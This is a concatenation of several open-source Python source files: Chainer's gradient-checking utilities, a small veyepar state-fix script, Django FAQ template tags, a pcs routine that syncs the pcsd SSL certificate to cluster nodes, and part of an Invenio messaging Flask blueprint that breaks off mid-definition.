# If the function consistently generates non-finite values
# around the point, we do not treat the point as
# non-differentiable.
# (Example: x<0 region for the logarithm function)
any_nonfinite = False
for i_out in range(nout):
isfinites = [xp.isfinite(ys[i_out]) for ys in yss]
if any((isfinites[0] != isfinites[i]).any()
for i in range(1, len(yss))):
s = six.StringIO()
s.write(
'Tried to compute the numeric gradient on a '
'non-differentiable point.\n\n')
s.write('i_in: {}\n'.format(i_in))
s.write('i_out: {}\n'.format(i_out))
s.write('x: {}\n'.format(inputs[i_in]))
s.write('index on x: {}\n'.format(i))
s.write('eps: {}\n'.format(eps))
s.write('y[x-eps ]: {}\n'.format(yss[0][i_out]))
s.write('y[x-eps/2]: {}\n'.format(yss[1][i_out]))
s.write('y[x ]: {}\n'.format(yss[2][i_out]))
s.write('y[x+eps/2]: {}\n'.format(yss[3][i_out]))
s.write('y[x+eps ]: {}\n'.format(yss[4][i_out]))
raise NondifferentiableError(s.getvalue())
any_nonfinite |= not all(_.all() for _ in isfinites)
if not any_nonfinite:
# Stack flattenend outputs to make (5, *)-shaped 2D array
ystack = xp.vstack(
[xp.hstack([y.ravel() for y in ys]) for ys in yss])
assert ystack.ndim == 2 and ystack.shape[0] == len(yss)
# Fit to quadratic
if gpu:
ystack = ystack.get()
polyfit = numpy.polynomial.polynomial.polyfit
_, (residuals, _, _, _) = polyfit(
range(len(yss)), ystack, deg=2, full=True)
if gpu:
residuals = xp.array(residuals)
residuals = xp.sqrt(residuals / len(yss))
# Check for error for each output array
for i_out in range(nout):
size = sizes[i_out]
cumsize = cumsizes[i_out]
shape = shapes[i_out]
# TODO(niboshi): The following two lines could be
# rewritten using xp.stack, which is supported in
# NumPy>=1.10
ymax = xp.concatenate(
[ys[i_out][None] for ys in yss]).max(axis=0)
ymin = xp.concatenate(
[ys[i_out][None] for ys in yss]).min(axis=0)
# Restore the shape of flattened residual
res = residuals[cumsize - size:cumsize]
res = res.reshape(shape)
det = xp.asarray(
diff_atol + diff_rtol * (ymax - ymin) < res)
# Constant output = not nondifferentiable
det[ymax == ymin] = False
if det.any():
s = six.StringIO()
s.write(
'Tried to compute the numeric gradient on a '
'non-differentiable point.\n\n')
s.write('i_in: {}\n'.format(i_in))
s.write('i_out: {}\n'.format(i_out))
s.write('x: {}\n'.format(inputs[i_in]))
s.write('index on x: {}\n'.format(i))
s.write('eps: {}\n'.format(eps))
s.write('diff_rtol: {}\n'.format(diff_rtol))
s.write('diff_atol: {}\n'.format(diff_atol))
s.write('ymax: {}\n'.format(ymax))
s.write('ymin: {}\n'.format(ymin))
s.write(
'diff_atol + diff_rtol * (ymax-ymin): {}\n'.format(
diff_atol + diff_rtol * (ymax - ymin)))
s.write('fitting errors: {}\n'.format(res))
s.write('y[x-eps ]: {}\n'.format(yss[0][i_out]))
s.write('y[x-eps/2]: {}\n'.format(yss[1][i_out]))
s.write('y[x ]: {}\n'.format(yss[2][i_out]))
s.write('y[x+eps/2]: {}\n'.format(yss[3][i_out]))
s.write('y[x+eps ]: {}\n'.format(yss[4][i_out]))
raise NondifferentiableError(s.getvalue())
# Calculate numerical gradient
for i_out, gy in enumerate(grad_outputs):
if gy is None:
continue
gpu_ = (gpu and
all(isinstance(ys[i_out], cuda.ndarray)
for ys in yss))
if len(yss) == 2: # 1st order
y0 = yss[0][i_out]
y1 = yss[1][i_out]
if gpu_:
numerical_grad_kernel_1(
y1, y0, xp.asarray(gy), eps, gx[i])
else:
dot = ((y1 - y0) * gy).sum()
gx[i] += dot / (2 * eps)
elif len(yss) == 5: # 3rd order
y0 = yss[0][i_out]
y1 = yss[1][i_out]
y2 = yss[3][i_out]
y3 = yss[4][i_out]
if gpu_:
numerical_grad_kernel_3(
y3, y2, y1, y0, gy, eps, gx[i])
else:
num = -y3 + 8 * y2 - 8 * y1 + y0
dot = (num * gy).sum()
gx[i] += dot / (6 * eps)
else:
assert False
# Calculate numeric gradient
with configuration.using_config('type_check', False):
for i_in, (x, gx) in enumerate(six.moves.zip(inputs, grads)):
orig_x = x.copy() # hold original value
for i in numpy.ndindex(x.shape):
iterate_single_input(i_in, x, orig_x, i)
return [g.astype(x.dtype, copy=False)
for g, x in six.moves.zip(grads, inputs)]
def assert_allclose(x, y, atol=1e-5, rtol=1e-4, verbose=True):
"""Asserts if some corresponding element of x and y differs too much.
This function can handle both CPU and GPU arrays simultaneously.
Args:
x: Left-hand-side array.
y: Right-hand-side array.
atol (float): Absolute tolerance.
rtol (float): Relative tolerance.
verbose (bool): If ``True``, it outputs verbose messages on error.
"""
warnings.warn(
'chainer.gradient_check.assert_allclose is deprecated.'
'Use chainer.testing.assert_allclose instead.',
DeprecationWarning)
testing.assert_allclose(x, y, atol, rtol, verbose)
def _as_tuple(x):
if isinstance(x, tuple):
return x
elif isinstance(x, list):
return tuple(x)
else:
return x,
def _filter_list(lst, ignore_list):
return [x for x, ignore in six.moves.zip(lst, ignore_list) if not ignore]
def check_backward(
func, x_data, y_grad, params=(),
eps=1e-3, atol=1e-5, rtol=1e-4, no_grads=None, dtype=None,
detect_nondifferentiable=False):
"""Test backward procedure of a given function.
This function automatically checks the backward-process of a given function
to ensure that the computed gradients are approximately correct.
For example, assuming you've defined a :class:`~chainer.FunctionNode` class
``MyFunc``, that takes two arguments and returns one value, you can wrap
it in a ordinary function and check its gradient computations as follows:
.. code-block:: python
def func(xs):
y, = MyFunc().apply(xs)
return y
x1_data = xp.array(...)
x2_data = xp.array(...)
gy_data = xp.array(...)
check_backward(func, (x1_data, x2_data), gy_data)
This method creates :class:`~chainer.Variable` objects with ``x_data``
and calls ``func`` with the :class:`~chainer.Variable`\\ s to get its
result as :class:`~chainer.Variable`.
Then, it sets ``y_grad`` array to ``grad`` attribute of the result and
calls ``backward`` method to get gradients of the inputs.
To check correctness of the gradients, the function calls
:func:`numerical_grad` to calculate numerically the gradients and compares
the types of gradients with :func:`chainer.testing.assert_allclose`.
To reduce computational time, it uses directional derivative along a
random vector. A function
:math:`g: \\mathbb{R} \\rightarrow \\mathbb{R}^n` is defined as
:math:`g(\\delta) = f(x + \\delta r)`, where
:math:`\\delta \\in \\mathbb{R}`, :math:`r \\in \\mathbb{R}^n`
is a random vector
and :math:`f` is a function which you want to test.
Its gradient is
.. math::
g'(\\delta) = f'(x + \\delta r) \\cdot r.
Therefore, :math:`g'(0) = f'(x) \\cdot r`.
So we can check the correctness of back propagation of :math:`f` indirectly
by comparing this equation with the gradient of :math:`g` numerically
calculated and that of :math:`f` computed by backprop.
If :math:`r` is chosen from uniform distribution, we can conclude with
high probability that the gradient of :math:`f` itself is correct.
If the function is non-differentiable with respect to some input objects,
we can check its backprop to such objects by ``no_grads`` argument.
``gradient_check`` computes numerical backward to inputs that correspond to
``False`` in ``no_grads``. It also asserts that the backprop leaves
gradients ``None`` for inputs that correspond to ``True`` in ``no_grads``.
The default of ``no_grads`` argument is the tuple of truth values whether
input objects (``x1_data`` or/and ``x2_data`` in this example) represent
integer variables.
You can simplify a test when ``MyFunc`` gets only one argument:
.. code-block:: python
check_backward(func, x1_data, gy_data)
If ``MyFunc`` is a loss function which returns a zero-dimensional
array, pass ``None`` to ``gy_data``. In this case, it sets ``1`` to
``grad`` attribute of the result:
.. code-block:: python
check_backward(my_loss_func,
(x1_data, x2_data), None)
If ``MyFunc`` returns multiple outputs, pass all gradients for outputs
as a tuple:
.. code-block:: python
gy1_data = xp.array(...)
gy2_data = xp.array(...)
check_backward(func, x1_data, (gy1_data, gy2_data))
You can also test a :class:`~chainer.Link`.
To check gradients of parameters of the link, set a tuple of the parameters
to ``params`` arguments:
.. code-block:: python
check_backward(my_link, (x1_data, x2_data), gy_data,
(my_link.W, my_link.b))
Note that ``params`` are not ``ndarray``\\ s,
but :class:`~chainer.Variables`\\ s.
Function objects are acceptable as ``func`` argument:
.. code-block:: python
check_backward(lambda x1, x2: f(x1, x2),
(x1_data, x2_data), gy_data)
.. note::
``func`` is called many times to get numerical gradients for all inputs.
This function doesn't work correctly when ``func`` behaves randomly as
it gets different gradients.
Args:
func (callable): A function which gets :class:`~chainer.Variable`\\ s
and returns :class:`~chainer.Variable`\\ s. ``func`` must returns
a tuple of :class:`~chainer.Variable`\\ s or one
:class:`~chainer.Variable`. You can use a
:class:`~chainer.Function`, :class:`~chainer.FunctionNode` or a
:class:`~chainer.Link` object or any other function satisfying the
condition.
x_data (ndarray or tuple of ndarrays): A set of ``ndarray``\\ s to be
passed to ``func``. If ``x_data`` is one ``ndarray`` object, it is
treated as ``(x_data,)``.
y_grad (ndarray or tuple of ndarrays or None):
A set of ``ndarray``\\ s representing gradients of return-values of
``func``. If ``y_grad`` is one ``ndarray`` object, it is
treated as ``(y_grad,)``. If ``func`` is a loss-function,
``y_grad`` should be set to ``None``.
params (~chainer.Variable or tuple of ~chainder.Variable):
A set of :class:`~chainer.Variable`\\ s whose gradients are
checked. When ``func`` is a :class:`~chainer.Link` object,
set its parameters as ``params``.
If ``params`` is one :class:`~chainer.Variable` object,
it is treated as ``(params,)``.
eps (float): Epsilon value to be passed to :func:`numerical_grad`.
atol (float): Absolute tolerance to be passed to
:func:`chainer.testing.assert_allclose`.
rtol (float): Relative tolerance to be passed to
:func:`chainer.testing.assert_allclose`.
no_grads (list of bool): Flag to skip variable for gradient assertion.
It should be same length as ``x_data``.
dtype (~numpy.dtype): ``x_data``, ``y_grad`` and ``params`` are casted
to this dtype when calculating numerical gradients. Only float
types and ``None`` are allowed.
detect_nondifferentiable (bool):
If ``True``, check for non-differentiable inputs is enabled.
If ``func`` is non-differentiable at ``x_data``, ``check_backward``
raises :class:`~chainer.gradient_check.NondifferentiableError`.
.. seealso::
:func:`numerical_grad`
"""
if dtype is not None and numpy.dtype(dtype).kind != 'f':
raise ValueError('`dtype` is allowed only float type')
x_data = _as_tuple(x_data)
if y_grad is not None:
y_grad = _as_tuple(y_grad)
params = _as_tuple(params)
xs = [variable.Variable(x) for x in x_data]
y = func(*xs)
y = _as_tuple(y)
y0_data = [_.data for _ in y]
# All creators of `y` need to be the same because we only call
# `y[0].backward` to call `backward` method of the creator.
# To do so we need to insert a dummy function `_GradientSetter` to the
# computational graph.
# Note that `func` may not be a `Function` object.
y, y_grad = _set_y_grad(y, y_grad)
# Clear gradients which may exist if func calls backward inside of itself.
_clear_grads(xs)
_clear_grads(params)
# We only need to call `backward` for one result `Variable`.
# `Variable.backward` method calls `Function.backward` of its creator.
y.backward()
if no_grads is None:
no_grads = [x.dtype.kind != 'f' for x in xs]
else:
if len(no_grads) != len(xs):
raise ValueError(
'Length of no_grads param and xs should be same.\n'
'Actual: {0} != {1}'.format(len(no_grads), len(xs)))
for skip, x in six.moves.zip(no_grads, xs):
if skip and x.grad is not None:
raise RuntimeError(
'gradient of int variable must be None')
if len(xs) - no_grads.count(True) + len(params) == 0:
# When there is no float variables, we need not to check gradient
# values
return
variables = _filter_list(xs, no_grads) + list(params)
# Keep the gradient arrays of params which may be overwritten by func
grads = [x.grad for x in variables]
if dtype is None:
casted_data = [x.data for x in variables]
else:
if numpy.dtype(dtype).kind != 'f':
raise ValueError('`dtype` is allowed only float type')
casted_data = [x.data.astype(dtype, copy=False) for x in variables]
# Even skipped variable must have the same dtype.
for x, skip in six.moves.zip(xs, no_grads):
if skip and x.data.dtype.kind == 'f':
x.data = x.data.astype(dtype, copy=False)
xp = cuda.get_array_module(*xs)
directions = [xp.random.normal(size=x.shape) for x in variables]
# The direction vector is normalized in order to keep the scale of
# differentiation error invariant with respect to the number of input
# dimensions. Ideally, the scale of the curvature with respect to each
# input dimension should be taken into account, but we ignore the
# differences and assume that the curvature is uniform with respect to all
# the input dimentions.
norm = math.sqrt(sum([xp.square(d).sum() for d in directions]))
if norm != 0:
# norm could be zero if input arrays are 0-sized.
scale = 1. / norm
directions = [d * scale for d in directions]
delta = xp.array(0., 'd')
def g():
# This functions is called twice in `numerical_grad`.
# `delta` is `epsilon` or `-epsilon` in these calls.
# See the document of `numerical_grad`.
for x, data, direction in six.moves.zip(
variables, casted_data, directions):
# astype is require to store data with the given type
data = (data.astype('d') +
delta * direction).astype(data.dtype)
if numpy.isscalar(data):
data = xp.array(data)
x.data = data
# Clear gradients to support func that calls backward inside of itself.
_clear_grads(xs)
_clear_grads(params)
ys = func(*xs)
ys = _as_tuple(ys)
ys_data = tuple(y.data for y in ys)
for x, data in six.moves.zip(variables, casted_data):
x.data = data
return ys_data
gx, = numerical_grad(
g, (delta,), y_grad, eps=eps,
detect_nondifferentiable=detect_nondifferentiable,
center_outputs=y0_data)
gx_accum = 0
for g, direction in six.moves.zip(grads, directions):
if g is not None:
gx_accum += (g.astype('d') * direction).sum()
try:
testing.assert_allclose(gx, gx_accum, atol=atol, rtol=rtol)
except AssertionError as e:
f = six.StringIO()
f.write('check_backward failed (eps={} atol={} rtol={})\n'.format(
eps, atol, rtol))
for i, x_ in enumerate(xs):
f.write('inputs[{}]:\n'.format(i))
f.write('{}\n'.format(x_))
for i, gy_ in enumerate(y_grad):
f.write('grad_outputs[{}]:\n'.format(i))
f.write('{}\n'.format(gy_))
for i, d_ in enumerate(directions):
f.write('directions[{}]:\n'.format(i))
f.write('{}\n'.format(d_))
f.write('gradients (numeric): {}\n'.format(gx))
f.write('gradients (backward): {}\n'.format(gx_accum))
f.write('\n')
f.write(str(e))
raise AssertionError(f.getvalue())
def check_double_backward(func, x_data, y_grad, x_grad_grad, params=(),
params_grad_grad=(), eps=1e-3, atol=1e-4, rtol=1e-3,
no_grads=None, dtype=None,
detect_nondifferentiable=False):
"""Test twice differentiation of a given procedure.
This function automatically checks if the backward procedure of ``func``
is correctly implemented for further differentiation. It first computes the
gradient of ``func`` w.r.t. its inputs in the same way as
:func:`~chainer.gradient_check.check_backward`. This function then further
invokes the backward procedure against the gradient variables, starting
from the initial gradient given by ``x_grad_grad``. It also computes the
second gradient using :func:`~chainer.gradient_check.numerical_grad`. The
resulting gradients are compared to confirm if the second-order gradients
are approximately correct.
Note that this function **DOES NOT** check if the first-order
differentiation is correct; the numerical gradient assumes that the
first-order gradient given by the usual :meth:`chainer.Variable.backward`
is correct. The implementation of each differentiable function should be
tested by :func:`~chainer.gradient_check.check_backward` first, and then
should be tested by this function if neccessary.
For the details of the arguments, see
:func:`~chainer.gradient_check.check_backward`. The additional arguments
``x_grad_grad`` and ``params_grad_grad`` are (tuples of)
:class:`~chainer.Variable` (s) that include the initial gradient
corresponding to the first-order gradient of each input and parameter. Note
that the default error tolerance ``atol`` and ``rtol`` are slightly larger
than those of :func:`~chainer.gradient_check.check_backward` because the
numerical gradients of the second order differentiation are less accurate
than those of the first order gradients.
"""
x_data = _as_tuple(x_data)
params = _as_tuple(params)
y_grad = _as_tuple(y_grad)
x_grad_grad = _as_tuple(x_grad_grad)
params_grad_grad = _as_tuple(params_grad_grad)
n_x = len(x_data)
first_order_no_grads = [x.dtype.kind != 'f' for x in x_data]
def first_order_grad(*inputs):
xs = inputs[:n_x]
gys = inputs[n_x:]
y = _as_tuple(func(*xs))
# Let all elements of y share the same creator.
# See the comment in check_backward.
y, _ = _set_y_grad(y, gys)
y.backward(enable_double_backprop=True)
gxs = []
for skip, x in six.moves.zip(first_order_no_grads, xs):
if skip:
if x.grad is not None:
raise RuntimeError(
'gradient of int variable must be None')
else:
if x.grad is None:
raise RuntimeError(
'gradients of some arguments are not calculated')
gxs.append(x.grad_var)
return tuple(gxs + [p.grad_var for p in params])
inputs = x_data + y_grad
grad_grad = x_grad_grad + params_grad_grad
try:
check_backward(first_order_grad, inputs, grad_grad, params=params,
eps=eps, atol=atol, rtol=rtol, no_grads=no_grads,
dtype=dtype,
detect_nondifferentiable=detect_nondifferentiable)
except AssertionError as e:
f = six.StringIO()
f.write('check_double_backward failed '
'(eps={} atol={} rtol={})\n'.format(eps, atol, rtol))
for i, x_ in enumerate(x_data):
f.write('input[{}]:\n'.format(i))
f.write('{}\n'.format(x_))
for i, gy_ in enumerate(y_grad):
f.write('grad_output[{}]:\n'.format(i))
f.write('{}\n'.format(gy_))
for i, ggx_ in enumerate(x_grad_grad):
f.write('grad_grad_input[{}]:\n'.format(i))
f.write('{}\n'.format(ggx_))
for i, ggp_ in enumerate(params_grad_grad):
f.write('grad_grad_param[{}]:\n'.format(i))
f.write('{}\n'.format(ggp_))
f.write('\n')
f.write(str(e))
raise AssertionError(f.getvalue())
class _GradientSetter(FunctionNode):
def __init__(self, grad):
self.grad = grad
def forward(self, inputs):
xp = cuda.get_array_module(inputs[0])
if self.grad is None:
y0, = inputs
gy0 = xp.ones_like(y0)
assert gy0.size == 1
self.grad = (gy0,)
# output a 0-sized 1-dim array like inputs
return xp.empty((0,), dtype=inputs[0].dtype),
def backward(self, inputs, grad_outputs):
grad = self.grad
return tuple(
None if g is None else variable.as_variable(g)
for g in grad)
def _set_y_grad(y, y_grad):
if y_grad is not None:
if len(y) != len(y_grad):
raise ValueError(
'Upstream gradients must contain equally many elements as '
'number of output elements.\n'
'Actual: {} != {}'.format(len(y), len(y_grad)))
y, = _GradientSetter(y_grad).apply(y)
else:
if len(y) != 1:
raise ValueError(
'Function must return a zero-dimensional array of length 1 '
'if the upstream gradient is `None`.\n'
'Actual: {} != 1'.format(len(y)))
y, = _GradientSetter(None).apply(y)
y_grad = (1,)
return y, y_grad
def _clear_grads(xs):
for x in xs:
x.grad_var = None
|
ronekko/chainer
|
chainer/gradient_check.py
|
Python
|
mit
| 29,683
|
#!/usr/bin/python
# fix.py - mass fix some goof
from process import process
from main.models import Show, Location, Episode, Raw_File, Cut_List
class fix(process):
# this will bump everything from 5 back to 4
ready_state = 7
def process_ep(self, ep):
if self.options.verbose: print(ep.id, ep.name)
ep.state = 4
ep.save()
ret = False # False else it will bump it +1)
return ret
if __name__ == '__main__':
p=fix()
p.main()
|
CarlFK/veyepar
|
dj/scripts/fix.py
|
Python
|
mit
| 492
|
from __future__ import absolute_import
from django import template
from ..models import Question, Topic
register = template.Library()
class FaqListNode(template.Node):
def __init__(self, num, varname, topic=None):
self.num = template.Variable(num)
self.topic = template.Variable(topic) if topic else None
self.varname = varname
def render(self, context):
try:
num = self.num.resolve(context)
topic = self.topic.resolve(context) if self.topic else None
except template.VariableDoesNotExist:
return ''
if isinstance(topic, Topic):
qs = Question.objects.filter(topic=topic)
elif topic is not None:
qs = Question.objects.filter(topic__slug=topic)
else:
qs = Question.objects.all()
context[self.varname] = qs.filter(status=Question.ACTIVE)[:num]
return ''
@register.tag
def faqs_for_topic(parser, token):
"""
Returns a list of 'count' faq's that belong to the given topic
the supplied topic argument must be in the slug format 'topic-name'
Example usage::
{% faqs_for_topic 5 "my-slug" as faqs %}
"""
args = token.split_contents()
if len(args) != 5:
raise template.TemplateSyntaxError("%s takes exactly four arguments" % args[0])
if args[3] != 'as':
raise template.TemplateSyntaxError("third argument to the %s tag must be 'as'" % args[0])
return FaqListNode(num=args[1], topic=args[2], varname=args[4])
@register.tag
def faq_list(parser, token):
"""
returns a generic list of 'count' faq's to display in a list
ordered by the faq sort order.
Example usage::
{% faq_list 15 as faqs %}
"""
args = token.split_contents()
if len(args) != 4:
raise template.TemplateSyntaxError("%s takes exactly three arguments" % args[0])
if args[2] != 'as':
raise template.TemplateSyntaxError("second argument to the %s tag must be 'as'" % args[0])
return FaqListNode(num=args[1], varname=args[3])
class TopicListNode(template.Node):
def __init__(self, varname):
self.varname = varname
def render(self, context):
context[self.varname] = Topic.objects.all()
return ''
@register.tag
def faq_topic_list(parser, token):
"""
Returns a list of all FAQ Topics.
Example usage::
{% faq_topic_list as topic_list %}
"""
args = token.split_contents()
if len(args) != 3:
raise template.TemplateSyntaxError("%s takes exactly two arguments" % args[0])
if args[1] != 'as':
raise template.TemplateSyntaxError("second argument to the %s tag must be 'as'" % args[0])
return TopicListNode(varname=args[2])
|
Mercy-Nekesa/sokoapp
|
sokoapp/fack/templatetags/faqtags.py
|
Python
|
mit
| 2,785
|
from pcs import settings
from pcs.common import (
file_type_codes,
reports,
)
from pcs.common.file import RawFileError
from pcs.common.reports.item import ReportItem
from pcs.common.tools import format_environment_error
from pcs.lib.communication.nodes import SendPcsdSslCertAndKey
from pcs.lib.communication.tools import run_and_raise
from pcs.lib.env import LibraryEnvironment
from pcs.lib.errors import LibraryError
from pcs.lib.node import get_existing_nodes_names
def synchronize_ssl_certificate(env: LibraryEnvironment, skip_offline=False):
"""
Send the local pcsd SSL cert and key to all full nodes in the local cluster.
Consider the pcs Web UI is accessed via an IP running as a resource in the
cluster. When the IP is moved, the user's browser connects to the new node
and we want it to get the same certificate to make the transition a
seamless experience (otherwise the browser display a warning that the
certificate has changed).
Using pcsd Web UI on remote and guest nodes is not supported (pcs/pcsd
depends on the corosanc.conf file being present on the local node) so we
send the cert only to corossync (== full stack) nodes.
"""
report_processor = env.report_processor
target_factory = env.get_node_target_factory()
cluster_nodes_names, report_list = get_existing_nodes_names(
env.get_corosync_conf()
)
if not cluster_nodes_names:
report_list.append(
ReportItem.error(reports.messages.CorosyncConfigNoNodesDefined())
)
report_processor.report_list(report_list)
try:
with open(settings.pcsd_cert_location, "r") as file:
ssl_cert = file.read()
except EnvironmentError as e:
report_processor.report(
ReportItem.error(
reports.messages.FileIoError(
file_type_codes.PCSD_SSL_CERT,
RawFileError.ACTION_READ,
format_environment_error(e),
file_path=settings.pcsd_cert_location,
)
)
)
try:
with open(settings.pcsd_key_location, "r") as file:
ssl_key = file.read()
except EnvironmentError as e:
report_processor.report(
ReportItem.error(
reports.messages.FileIoError(
file_type_codes.PCSD_SSL_KEY,
RawFileError.ACTION_READ,
format_environment_error(e),
file_path=settings.pcsd_key_location,
)
)
)
(
target_report_list,
target_list,
) = target_factory.get_target_list_with_reports(
cluster_nodes_names, skip_non_existing=skip_offline
)
report_processor.report_list(target_report_list)
if report_processor.has_errors:
raise LibraryError()
env.report_processor.report(
ReportItem.info(
reports.messages.PcsdSslCertAndKeyDistributionStarted(
sorted([target.label for target in target_list])
)
)
)
com_cmd = SendPcsdSslCertAndKey(env.report_processor, ssl_cert, ssl_key)
com_cmd.set_targets(target_list)
run_and_raise(env.get_node_communicator(), com_cmd)
|
tomjelinek/pcs
|
pcs/lib/commands/pcsd.py
|
Python
|
gpl-2.0
| 3,265
|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2011, 2013, 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""WebMessage Flask Blueprint"""
from datetime import datetime
from flask import render_template, request, flash, redirect, url_for, Blueprint
from flask.ext.breadcrumbs import default_breadcrumb_root, register_breadcrumb
from flask.ext.login import current_user, login_required
from flask.ext.menu import register_menu
from sqlalchemy.sql import operators
from invenio.base.decorators import (wash_arguments, templated, sorted_by,
filtered_by)
from invenio.base.globals import cfg
from invenio.base.i18n import _
from invenio.ext.template import render_template_to_string
from invenio.ext.principal import permission_required
from invenio.ext.sqlalchemy import db
from . import dblayer
from . import query as dbquery
from .forms import AddMsgMESSAGEForm, FilterMsgMESSAGEForm
from .models import MsgMESSAGE, UserMsgMESSAGE, email_alert_register
class MessagesMenu(object):
def __str__(self):
uid = current_user.get_id()
dbquery.update_user_inbox_for_reminders(uid)
unread = db.session.query(db.func.count(UserMsgMESSAGE.id_msgMESSAGE)).\
filter(db.and_(
UserMsgMESSAGE.id_user_to == uid,
UserMsgMESSAGE.status == cfg['CFG_WEBMESSAGE_STATUS_CODE']['NEW']
)).scalar()
return render_template_to_string("messages/menu_item.html", unread=unread)
not_guest = lambda: not current_user.is_guest
blueprint = Blueprint('webmessage', __name__, url_prefix="/yourmessages",
template_folder='templates', static_folder='static')
default_breadcrumb_root(blueprint, '.webaccount.messages')
@blueprint.route('/menu', methods=['GET'])
#FIXME if request is_xhr then do not return 401
#@login_required
#@permission_required('usemessages')
#@templated('messages/menu.html')
def menu():
uid = current_user.get_id()
dbquery.update_user_inbox_for_reminders(uid)
# join: msgMESSAGE -> user_msgMESSAGE, msgMESSAGE -> users
# filter: all messages from user AND filter form
# order: sorted by one of the table column
messages = db.session.query(MsgMESSAGE, UserMsgMESSAGE).\
join(MsgMESSAGE.user_from, MsgMESSAGE.sent_to_users).\
filter(db.and_(dbquery.filter_all_messages_from_user(uid))).\
order_by(db.desc(MsgMESSAGE.received_date)).limit(5)
#return dict(messages=messages.all())
return render_template('messages/menu.html', messages=messages.all())
@blueprint.route('/', methods=['GET', 'POST'])
@blueprint.route('/index', methods=['GET', 'POST'])
@blueprint.route('/display', methods=['GET', 'POST'])
@login_required
@permission_required('usemessages')
@sorted_by(MsgMESSAGE)
@filtered_by(MsgMESSAGE, columns={
'subject': operators.startswith_op,
'user_from.nickname': operators.contains_op},
form=FilterMsgMESSAGEForm)
@templated('messages/index.html')
@register_breadcrumb(blueprint, '.', _('Your Messages'))
@register_menu(blueprint, 'personalize.messages', _('Your messages'), order=10)
@register_menu(blueprint, 'main.messages', MessagesMenu(), order=-3,
visible_when=not_guest)
def index(sort=False, filter=None):
from invenio.legacy.webmessage.api import is_no_quota_user
uid = current_user.get_id()
dbquery.update_user_inbox_for_reminders(uid)
# join: msgMESSAGE -> user_msgMESSAGE, msgMESSAGE -> users
# filter: all messages from user AND filter form
# order: sorted by one of the table column
messages = db.session.query(MsgMESSAGE, UserMsgMESSAGE).\
join(MsgMESSAGE.user_from, MsgMESSAGE.sent_to_users).\
filter(db.and_(dbquery.filter_all_messages_from_user(uid), (filter))).\
order_by(sort)
return dict(messages=messages.all(),
nb_messages=dbquery.count_nb_messages(uid),
no_quota=is_no_quota_user(uid))
@blueprint.route("/add", methods=['GET', 'POST'])
@blueprint.route("/write", methods=['GET', 'POST'])
@register_breadcrumb(blueprint, '.add', _('Write a message'))
@login_required
@permission_required('usemessages')
@wash_arguments({'msg_reply_id': (int, 0)})
def add(msg_reply_id):
from invenio.utils.mail import email_quote_txt
uid = current_user.get_id()
if msg_reply_id:
if (dblayer.check_user_owns_message(uid, msg_reply_id) == 0):
flash(_('Sorry, this message in not in your mailbox.'), "error")
return redirect(url_for('.index'))
else:
try:
m = dbquery.get_message(uid, msg_reply_id)
message = MsgMESSAGE()
message.sent_to_user_nicks = m.message.user_from.nickname \
or str(m.message.id_user_from)
message.subject = _("Re:") + " " + m.message.subject
message.body = email_quote_txt(m.message.body)
form = AddMsgMESSAGEForm(request.form, obj=message)
return render_template('messages/add.html', form=form)
except db.sqlalchemy.orm.exc.NoResultFound:
# The message exists in table user_msgMESSAGE
# but not in table msgMESSAGE => table inconsistency
flash(_('This message does not exist.'), "error")
except:
flash(_('Problem with loading message.'), "error")
return redirect(url_for('.index'))
form = AddMsgMESSAGEForm(request.values)
if form.validate_on_submit():
m = MsgMESSAGE()
form.populate_obj(m)
m.id_user_from = uid
m.sent_date = datetime.now()
quotas = dblayer.check_quota(cfg['CFG_WEBMESSAGE_MAX_NB_OF_MESSAGES'] - 1)
users = filter(lambda x: x.id in quotas, m.recipients)
#m.recipients = m.recipients.difference(users))
for u in users:
m.recipients.remove(u)
if len(users) > 0:
flash(_('Following users reached their quota %(quota)d messages: %(users)s',
quota=cfg['CFG_WEBMESSAGE_MAX_NB_OF_MESSAGES'],
users=', '.join([u.nickname for u in users])), "error")
flash(_('Message has %(recipients)d valid recipients.',
recipients=len(m.recipients)), "info")
if len(m.recipients) == 0:
flash(_('Message was not sent'), "info")
else:
if m.received_date is not None and m.received_date > datetime.now():
for um in m.sent_to_users:
um.status = cfg['CFG_WEBMESSAGE_STATUS_CODE']['REMINDER']
else:
m.received_date = datetime.now()
try:
db.session.add(m)
db.session.commit()
flash(_('Message was sent'), "info")
return redirect(url_for('.index'))
except:
db.session.rollback()
return render_template('messages/add.html', form=form)
@blueprint.route("/view")
@blueprint.route("/display_msg")
@register_breadcrumb(blueprint, '.view', _('View a message'))
@login_required
@permission_required('usemessages')
@wash_arguments({'msgid': (int, 0)})
@templated('messages/view.html')
def view(msgid):
uid = current_user.get_id()
if (dbquery.check_user_owns_message(uid, msgid) == 0):
flash(_('Sorry, this message (#%(x_msg)d) is not in your mailbox.',
x_msg=msgid), "error")
else:
try:
m = dbquery.get_message(uid, msgid)
m.status = cfg['CFG_WEBMESSAGE_STATUS_CODE']['READ']
## It's not necessary since "m" is SQLAlchemy object bind with same
## session.
##db.session.add(m)
## I wonder if the autocommit works ...
# Commit changes before rendering for correct menu update.
db.session.commit()
return dict(m=m)
except db.sqlalchemy.orm.exc.NoResultFound:
flash(_('This message does not exist.'), "error")
except:
flash(_('Problem with loading message.'), "error")
return redirect(url_for('.index'))
@blueprint.route("/delete", methods=['GET', 'POST'])
@login_required
@permission_required('usemessages')
def delete():
"""
Delete message specified by 'msgid' that belongs to logged user.
"""
uid = current_user.get_id()
msgids = request.values.getlist('msgid', type=int)
if len(msgids) <= 0:
flash(_('Sorry, no valid message specified.'), "error")
elif dbquery.check_user_owns_message(uid, msgids) < len(msgids):
flash(_('Sorry, this message (#%(x_msg)s) is not in your mailbox.', x_msg=(str(msgids), )), "error")
else:
if dbquery.delete_message_from_user_inbox(uid, msgids) == 0:
flash(_("The message could not be deleted."), "error")
else:
flash(_("The message was successfully deleted."), "info")
return redirect(url_for('.index'))
@blueprint.route("/delete_all", methods=['GET', 'POST'])
@register_breadcrumb(blueprint, '.delete', _('Delete all messages'))
@login_required
@permission_required('usemessages')
